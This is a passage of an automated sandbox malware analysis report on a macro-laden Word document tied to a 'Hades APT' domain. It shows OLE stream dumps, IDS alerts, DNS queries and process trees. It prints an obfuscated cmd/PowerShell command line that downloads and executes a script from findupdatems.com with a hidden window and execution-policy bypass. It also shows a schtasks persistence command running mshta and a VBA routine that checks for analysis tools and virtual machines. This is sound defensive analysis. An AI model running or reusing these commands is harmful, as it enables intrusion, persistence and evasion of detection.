                Data Raw:49 44 3d 22 7b 39 33 30 46 45 35 30 44 2d 35 37 35 35 2d 34 31 36 36 2d 41 38 37 38 2d 42 35 37 44 32 39 38 36 35 33 35 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
                General
                Stream Path:Macros/PROJECTwm
                File Type:data
                Stream Size:41
                Entropy:3.07738448508
                Base64 Encoded:False
                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5114
                General
                Stream Path:Macros/VBA/_VBA_PROJECT
                File Type:data
                Stream Size:5114
                Entropy:4.99966211034
                Base64 Encoded:True
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 775
                General
                Stream Path:Macros/VBA/dir
                File Type:data
                Stream Size:775
                Entropy:6.43917583239
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . E & . ] . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . X . ] .
                Data Raw:01 03 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 45 26 99 5d 12 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                Stream Path: ObjectPool/_1600546349/\x1CompObj, File Type: data, Stream Size: 112
                General
                Stream Path:ObjectPool/_1600546349/\x1CompObj
                File Type:data
                Stream Size:112
                Entropy:4.6011544911
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1600546349/\x3OCXNAME, File Type: data, Stream Size: 16
                General
                Stream Path:ObjectPool/_1600546349/\x3OCXNAME
                File Type:data
                Stream Size:16
                Entropy:1.9237949407
                Base64 Encoded:False
                Data ASCII:F . r . a . m . e . 1 . . . . .
                Data Raw:46 00 72 00 61 00 6d 00 65 00 31 00 00 00 00 00
                Stream Path: ObjectPool/_1600546349/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1600546349/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1600546349/\x3PRINT, File Type: data, Stream Size: 526
                General
                Stream Path:ObjectPool/_1600546349/\x3PRINT
                File Type:data
                Stream Size:526
                Entropy:3.40231292088
                Base64 Encoded:False
                Data ASCII:. . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:08 00 61 02 84 00 00 00 01 00 09 00 00 03 03 01 00 00 04 00 1c 00 00 00 00 00 04 00 00 00 03 01 08 00 05 00 00 00 0b 02 00 00 00 00 05 00 00 00 0c 02 05 00 17 00 03 00 00 00 1e 00 07 00 00 00 fc 02 00 00 f0 f0 f0 00 00 00 04 00 00 00 2d 01 00 00 09 00 00 00 1d 06 21 00 f0 00 0e 00 17 00 00 00 00 00 07 00 00 00 fc 02 00 00 ff ff ff 00 00 00 04 00 00 00 2d 01 01 00 07 00 00 00 16 04
                Stream Path: ObjectPool/_1600546349/f, File Type: data, Stream Size: 100
                General
                Stream Path:ObjectPool/_1600546349/f
                File Type:data
                Stream Size:100
                Entropy:3.93151077749
                Base64 Encoded:False
                Data ASCII:. . , . . . . . . . . . . . . . . . . . . } . . a . . . . . . . . . . . . . . . F r a m e 1 . . . R . . . . . . . . . . . K . Q . . . . . . . 2 . . . T i m e s N e w R o m a n . . . . . . . . . .
                Data Raw:00 04 2c 00 00 0c 1a 08 03 00 00 00 06 00 00 80 ff ff 00 00 00 7d 00 00 61 02 00 00 7f 00 00 00 00 00 00 00 00 00 00 00 46 72 61 6d 65 31 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 00 00 00 bc 02 80 32 02 00 0f 54 69 6d 65 73 20 4e 65 77 20 52 6f 6d 61 6e 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1600546349/o, File Type: empty, Stream Size: 0
                General
                Stream Path:ObjectPool/_1600546349/o
                File Type:empty
                Stream Size:0
                Entropy:0.0
                Base64 Encoded:False
                Data ASCII:
                Data Raw:
                Stream Path: WordDocument, File Type: data, Stream Size: 52782
                General
                Stream Path:WordDocument
                File Type:data
                Stream Size:52782
                Entropy:4.0634009054
                Base64 Encoded:False
                Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . b . . . d R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . h . . . . . . . h . . . . . . . h . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . | . . . . . . . | . . . . . . . | . . . . . . . | . . . . .
                Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 12 c3 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e ce 00 00 62 7f 00 00 62 7f 00 00 64 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                11/17/18-23:01:23.432908UDP2026620ET TROJAN Hades APT Domain in DNS Lookup (findupdatems .com)5980753192.168.0.608.8.8.8

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Nov 17, 2018 23:01:23.432908058 CET5980753192.168.0.608.8.8.8
                Nov 17, 2018 23:01:23.612406015 CET53598078.8.8.8192.168.0.60

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Nov 17, 2018 23:01:23.432908058 CET5980753192.168.0.608.8.8.8
                Nov 17, 2018 23:01:23.612406015 CET53598078.8.8.8192.168.0.60

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Nov 17, 2018 23:01:23.432908058 CET192.168.0.608.8.8.80x872dStandard query (0)findupdatems.comA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Nov 17, 2018 23:01:23.612406015 CET8.8.8.8192.168.0.600x872dServer failure (2)findupdatems.comnonenoneA (IP address)IN (0x0001)

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                Analysis Process: WINWORD.EXE PID: 160 Parent PID: 3360

                General

                Start time:23:00:10
                Start date:17/11/2018
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\18#U042f.doc
                Imagebase:0x2fe00000
                File size:1422680 bytes
                MD5 hash:BFF948019509B5BF3F9B6CEED2E2B8E3
                Has administrator privileges:true
                Programmed in:"C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: splwow64.exe PID: 3436 Parent PID: 160

                General

                Start time:23:00:14
                Start date:17/11/2018
                Path:C:\Windows\splwow64.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\splwow64.exe 12288
                Imagebase:0xd50000
                File size:111616 bytes
                MD5 hash:12431297FC2A420A47C367996ADB299F
                Has administrator privileges:true
                Programmed in:"C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: schtasks.exe PID: 3240 Parent PID: 160

                General

                Start time:23:00:33
                Start date:17/11/2018
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
                Imagebase:0x1180000
                File size:186880 bytes
                MD5 hash:22CFF8E0A49073A4C7A0A9BBADEF062B
                Has administrator privileges:true
                Programmed in:"C, C++ or other language
                Reputation:low

                Chronological Activities

                Analysis Process: conhost.exe PID: 4064 Parent PID: 3240

                General

                Start time:23:00:33
                Start date:17/11/2018
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0x4
                Imagebase:0xf80000
                File size:46080 bytes
                MD5 hash:66CC0EE1A55D150A84EF8D91D18B7C55
                Has administrator privileges:true
                Programmed in:"C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: mshta.exe PID: 3684 Parent PID: 924

                General

                Start time:10:20:00
                Start date:18/11/2018
                Path:C:\Windows\System32\mshta.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Roaming\WPFT532.hta
                Imagebase:0xb50000
                File size:13312 bytes
                MD5 hash:81FE91EE083E3D4B7404205A0F65E905
                Has administrator privileges:false
                Programmed in:"C, C++ or other language
                Yara matches:
                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.2369970087.058E0000.00000004.sdmp, Author: Florian Roth
                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.2365632769.00600000.00000004.sdmp, Author: Florian Roth
                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.2365595933.005DE000.00000004.sdmp, Author: Florian Roth
                Reputation:low

                Chronological Activities

                Analysis Process: cmd.exe PID: 388 Parent PID: 3684

                General

                Start time:10:20:05
                Start date:18/11/2018
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50, 43 ,91 , 99 ,104, 65, 114 , 93,49,48,54, 43, 91 ,99, 104, 65,114,93 , 49 , 50 ,50,41,44, 39, 124 , 39 ,41 , 124 , 32, 46 ,32 , 40 , 32 ,36, 69, 110 ,86 , 58,67 , 79, 109 , 83, 80, 101 , 99 ,91,52 , 44 ,50, 52 ,44 ,50,53, 93 , 45 , 106,79 ,73 ,110 ,39 , 39, 41)^| . ( $pshOme[21]+$PSHoMe[30]+'x') &&Set gnPq=ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ^| pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -&& c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%'
                Imagebase:0x1090000
                File size:202240 bytes
                MD5 hash:7DB6A5CEEAC1CB15CF78552794B3DB31
                Has administrator privileges:false
                Programmed in:"C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: conhost.exe PID: 3072 Parent PID: 388

                General

                Start time:10:20:05
                Start date:18/11/2018
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0x4
                Imagebase:0xf80000
                File size:46080 bytes
                MD5 hash:66CC0EE1A55D150A84EF8D91D18B7C55
                Has administrator privileges:false
                Programmed in:"C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: cmd.exe PID: 2176 Parent PID: 388

                General

                Start time:10:20:06
                Start date:18/11/2018
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%
                Imagebase:0x1090000
                File size:202240 bytes
                MD5 hash:7DB6A5CEEAC1CB15CF78552794B3DB31
                Has administrator privileges:false
                Programmed in:"C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: cmd.exe PID: 240 Parent PID: 2176

                General

                Start time:10:20:06
                Start date:18/11/2018
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe '
                Imagebase:0x1090000
                File size:202240 bytes
                MD5 hash:7DB6A5CEEAC1CB15CF78552794B3DB31
                Has administrator privileges:false
                Programmed in:"C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: powershell.exe PID: 2992 Parent PID: 2176

                General

                Start time:10:20:06
                Start date:18/11/2018
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -
                Imagebase:0x10e0000
                File size:451072 bytes
                MD5 hash:679D4A662B57B0079FBD409DAB6CC830
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000002.2380851729.06F8A000.00000004.sdmp, Author: Florian Roth
                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000003.2186142865.005BA000.00000004.sdmp, Author: Florian Roth
                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000002.2374595497.00910000.00000004.sdmp, Author: Florian Roth
                Reputation:moderate

                Chronological Activities

                Analysis Process: schtasks.exe PID: 944 Parent PID: 160

                General

                Start time:10:21:37
                Start date:18/11/2018
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
                Imagebase:0x1180000
                File size:186880 bytes
                MD5 hash:22CFF8E0A49073A4C7A0A9BBADEF062B
                Has administrator privileges:true
                Programmed in:"C, C++ or other language
                Reputation:low

                Chronological Activities

                Analysis Process: conhost.exe PID: 3488 Parent PID: 944

                General

                Start time:10:21:37
                Start date:18/11/2018
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0x4
                Imagebase:0xf80000
                File size:46080 bytes
                MD5 hash:66CC0EE1A55D150A84EF8D91D18B7C55
                Has administrator privileges:true
                Programmed in:"C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: schtasks.exe PID: 1756 Parent PID: 160

                General

                Start time:10:21:38
                Start date:18/11/2018
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
                Imagebase:0x1180000
                File size:186880 bytes
                MD5 hash:22CFF8E0A49073A4C7A0A9BBADEF062B
                Has administrator privileges:true
                Programmed in:"C, C++ or other language
                Reputation:low

                Chronological Activities

                Analysis Process: conhost.exe PID: 2168 Parent PID: 1756

                General

                Start time:10:21:38
                Start date:18/11/2018
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0x4
                Imagebase:0xf80000
                File size:46080 bytes
                MD5 hash:66CC0EE1A55D150A84EF8D91D18B7C55
                Has administrator privileges:true
                Programmed in:"C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: schtasks.exe PID: 3512 Parent PID: 160

                General

                Start time:10:21:40
                Start date:18/11/2018
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
                Imagebase:0x1180000
                File size:186880 bytes
                MD5 hash:22CFF8E0A49073A4C7A0A9BBADEF062B
                Has administrator privileges:true
                Programmed in:"C, C++ or other language
                Reputation:low

                Chronological Activities

                Analysis Process: conhost.exe PID: 3172 Parent PID: 3512

                General

                Start time:10:21:40
                Start date:18/11/2018
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0x4
                Imagebase:0xf80000
                File size:46080 bytes
                MD5 hash:66CC0EE1A55D150A84EF8D91D18B7C55
                Has administrator privileges:true
                Programmed in:"C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Disassembly

                Code Analysis

                VBA Code

                Call Graph

                Graph

                • Entrypoint
                • Decryption Function
                • Executed
                • Not Executed
                • Show Help
                callgraph 10 Frame1_Layout Replace:1,CreateObject:2 141 fixer_base 10->141 175 fstexp 10->175 419 NAPHLPR Run:1 10->419 526 MSART8 Len:1 10->526 x 3 610 KYEPC270 Array:1,LCase:2,ExecQuery:1,InStr:1,GetObject:1, Name:1 10->610 828 J0289430 Write:1,Environ:1,Close:1,CreateObject:1,CreateTextFile:1 10->828 894 xrWPpb4 Select:1,Font:1 10->894 915 wsepno Delete:1,ActiveDocument:1 10->915 141->526 480 GRAPH 419->480 584 modemcsa Asc:1,Mid:1,Chr:1 526->584 610->526 x 28 828->526 x 4

                Module: ThisDocument

                Declaration
                LineContent
                1

                Attribute VB_Name = "ThisDocument"

                2

                Attribute VB_Base = "1Normal.ThisDocument"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = True

                8

                Attribute VB_Customizable = True

                9

                Attribute VB_Control = "Frame1, 0, 0, MSForms, Frame"

                Executed Functions
                Function KYEPC270, APIs: 9, Strings: 33, Number of lines: 24, Relevance: 96.024
                APIsMeta Information

                Array

                Part of subcall function MSART8@ThisDocument: Len

                GetObject

                		GetObject("wINMGmts:\\.\root\ciMV2")

                Part of subcall function MSART8@ThisDocument: Len

                ExecQuery

                		SWbemServicesEx.ExecQuery("SELECT NamE FROM WIn32_PRoCEsS")

                Part of subcall function MSART8@ThisDocument: Len

                InStr

                		InStr("system idle process","hacker") -> 0 InStr("system idle process","malzilla") -> 0 InStr("system idle process","procexp") -> 0 InStr("system idle process","wireshark") -> 0 InStr("system idle process","hxd") -> 0 InStr("system idle process","powershell_ise") -> 0 InStr("system idle process","ida") -> 0 InStr("system idle process","olly") -> 0 InStr("system idle process","fiddler") -> 0 InStr("system idle process","malware") -> 0 InStr("system idle process","vmtoolsd") -> 0 InStr("system idle process","swingbox") -> 0 InStr("system idle process","vboxtray") -> 0 InStr("system idle process","secunia") -> 0 InStr("system idle process","hijack") -> 0 InStr("system idle process","vmtoolsd'") -> 0 InStr("system idle process","vbox") -> 0 InStr("system idle process","vmware") -> 0 InStr("system idle process","vxstream") -> 0 InStr("system idle process","autoit") -> 0 InStr("system idle process","vmtools") -> 0 InStr("system idle process","tcpview") -> 0 InStr("system idle process","process explorer") -> 0 InStr("system idle process","visual basic") -> 0 InStr("system","hacker") -> 0 InStr("system","malzilla") -> 0 InStr("system","procexp") -> 0 InStr("system","wireshark") -> 0 InStr("system","hxd") -> 0 InStr("system","powershell_ise") -> 0 InStr("system","ida") -> 0 InStr("system","olly") -> 0 InStr("system","fiddler") -> 0 InStr("system","malware") -> 0 InStr("system","vmtoolsd") -> 0 InStr("system","swingbox") -> 0 InStr("system","vboxtray") -> 0 InStr("system","secunia") -> 0 InStr("system","hijack") -> 0 InStr("system","vmtoolsd'") -> 0 InStr("system","vbox") -> 0 InStr("system","vmware") -> 0 InStr("system","vxstream") -> 0 InStr("system","autoit") -> 0 InStr("system","vmtools") -> 0 InStr("system","tcpview") -> 0 InStr("system","process explorer") -> 0 InStr("system","visual basic") -> 0 InStr("smss.exe","hacker") -> 0 InStr("smss.exe","malzilla") -> 0 InStr("smss.exe","procexp") -> 0 InStr("smss.exe","wireshark") -> 0 InStr("smss.exe","hxd") -> 0 InStr("smss.exe","powershell_ise") -> 0 InStr("smss.exe","ida") -> 0 InStr("smss.exe","olly") -> 0 InStr("smss.exe","fiddler") -> 0 InStr("smss.exe","malware") -> 0 InStr("smss.exe","vmtoolsd") -> 0 InStr("smss.exe","swingbox") -> 0 InStr("smss.exe","vboxtray") -> 0 InStr("smss.exe","secunia") -> 0 InStr("smss.exe","hijack") -> 0 InStr("smss.exe","vmtoolsd'") -> 0 InStr("smss.exe","vbox") -> 0 InStr("smss.exe","vmware") -> 0 InStr("smss.exe","vxstream") -> 0 InStr("smss.exe","autoit") -> 0 InStr("smss.exe","vmtools") -> 0 InStr("smss.exe","tcpview") -> 0 InStr("smss.exe","process explorer") -> 0 InStr("smss.exe","visual basic") -> 0 InStr("csrss.exe","hacker") -> 0 InStr("csrss.exe","malzilla") -> 0 InStr("csrss.exe","procexp") -> 0 InStr("csrss.exe","wireshark") -> 0 InStr("csrss.exe","hxd") -> 0 InStr("csrss.exe","powershell_ise") -> 0 InStr("csrss.exe","ida") -> 0 InStr("csrss.exe","olly") -> 0 InStr("csrss.exe","fiddler") -> 0 InStr("csrss.exe","malware") -> 0 InStr("csrss.exe","vmtoolsd") -> 0 InStr("csrss.exe","swingbox") -> 0 InStr("csrss.exe","vboxtray") -> 0 InStr("csrss.exe","secunia") -> 0 InStr("csrss.exe","hijack") -> 0 InStr("csrss.exe","vmtoolsd'") -> 0 InStr("csrss.exe","vbox") -> 0 InStr("csrss.exe","vmware") -> 0 InStr("csrss.exe","vxstream") -> 0 InStr("csrss.exe","autoit") -> 0 InStr("csrss.exe","vmtools") -> 0 InStr("csrss.exe","tcpview") -> 0 InStr("csrss.exe","process explorer") -> 0 InStr("csrss.exe","visual basic") -> 0 InStr("wininit.exe","hacker") -> 0 InStr("wininit.exe","malzilla") -> 0 InStr("wininit.exe","procexp") -> 0 InStr("wininit.exe","wireshark") -> 0 InStr("wininit.exe","hxd") -> 0 InStr("wininit.exe","powershell_ise") -> 0 InStr("wininit.exe","ida") -> 0 InStr("wininit.exe","olly") -> 0 InStr("wininit.exe","fiddler") -> 0 InStr("wininit.exe","malware") -> 0 InStr("wininit.exe","vmtoolsd") -> 0 InStr("wininit.exe","swingbox") -> 0 InStr("wininit.exe","vboxtray") -> 0 InStr("wininit.exe","secunia") -> 0 InStr("wininit.exe","hijack") -> 0 InStr("wininit.exe","vmtoolsd'") -> 0 InStr("wininit.exe","vbox") -> 0 InStr("wininit.exe","vmware") -> 0 InStr("wininit.exe","vxstream") -> 0 InStr("wininit.exe","autoit") -> 0 InStr("wininit.exe","vmtools") -> 0 InStr("wininit.exe","tcpview") -> 0 InStr("wininit.exe","process explorer") -> 0 InStr("wininit.exe","visual basic") -> 0 InStr("winlogon.exe","hacker") -> 0 InStr("winlogon.exe","malzilla") -> 0 InStr("winlogon.exe","procexp") -> 0 InStr("winlogon.exe","wireshark") -> 0 InStr("winlogon.exe","hxd") -> 0 InStr("winlogon.exe","powershell_ise") -> 0 InStr("winlogon.exe","ida") -> 0 InStr("winlogon.exe","olly") -> 0 InStr("winlogon.exe","fiddler") -> 0 InStr("winlogon.exe","malware") -> 0 InStr("winlogon.exe","vmtoolsd") -> 0 InStr("winlogon.exe","swingbox") -> 0 InStr("winlogon.exe","vboxtray") -> 0 InStr("winlogon.exe","secunia") -> 0 InStr("winlogon.exe","hijack") -> 0 InStr("winlogon.exe","vmtoolsd'") -> 0 InStr("winlogon.exe","vbox") -> 0 InStr("winlogon.exe","vmware") -> 0 InStr("winlogon.exe","vxstream") -> 0 InStr("winlogon.exe","autoit") -> 0 InStr("winlogon.exe","vmtools") -> 0 InStr("winlogon.exe","tcpview") -> 0 InStr("winlogon.exe","process explorer") -> 0 InStr("winlogon.exe","visual basic") -> 0 InStr("services.exe","hacker") -> 0 InStr("services.exe","malzilla") -> 0 InStr("services.exe","procexp") -> 0 InStr("services.exe","wireshark") -> 0 InStr("services.exe","hxd") -> 0 InStr("services.exe","powershell_ise") -> 0 InStr("services.exe","ida") -> 0 InStr("services.exe","olly") -> 0 InStr("services.exe","fiddler") -> 0 InStr("services.exe","malware") -> 0 InStr("services.exe","vmtoolsd") -> 0 InStr("services.exe","swingbox") -> 0 InStr("services.exe","vboxtray") -> 0 InStr("services.exe","secunia") -> 0 InStr("services.exe","hijack") -> 0 InStr("services.exe","vmtoolsd'") -> 0 InStr("services.exe","vbox") -> 0 InStr("services.exe","vmware") -> 0
